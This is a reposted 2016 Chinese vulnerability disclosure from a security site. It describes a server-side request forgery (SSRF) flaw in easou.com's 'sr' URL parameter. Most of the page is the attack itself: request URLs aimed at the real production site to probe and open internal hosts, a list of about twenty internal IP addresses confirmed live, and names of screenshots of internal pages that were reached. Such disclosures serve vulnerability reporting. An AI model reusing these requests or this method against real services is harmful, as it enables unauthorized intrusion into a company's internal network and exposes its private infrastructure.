频道栏目
首页 > 安全 > 网站安全 > 正文

宜搜科技内网存在漏洞ssrf漫游

2016-06-04 09:10:27           
收藏   我要投稿

http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=192.168.1.10&wver=c#

#内网探测

IP错误返回页面内网为空

 

y5.png

 

IP正确则重定向到该页面

192.168.1.10

192.168.1.22

192.168.1.254

192.168.1.189

10.26.28.244

10.26.28.247

10.26.28.157

10.26.28.248

10.26.28.198

10.13.4.50

10.13.4.51

10.13.4.52

10.13.4.61

10.13.4.43

10.13.4.53

10.13.4.55

10.13.4.56

10.13.4.57

10.13.4.58

10.13.4.59

10.13.4.39

10.13.4.99

最开始以为只是内网探测而已,但是惊奇的发现居然可以内网访问

http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=http://192.168.1.222&wver=c#

 

y2.png

 

http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=http://192.168.1.231&wver=c#

 

y1.png

 

 

Y6.png

 

http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=http://192.168.1.250&wver=c#

 

y3.png

 

http://z.easou.com/show.m?esid=zxHvHNlffsZ&p=1&pn=1&q=&sr=http://10.26.28.197&wver=c

 

y4.png

 

相关TAG标签 漏洞 科技
上一篇:人人网某站利用默认口令登录/系统信息查看/任意SQL语句查询
下一篇:神器而已之西部数码某站SQL注入漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站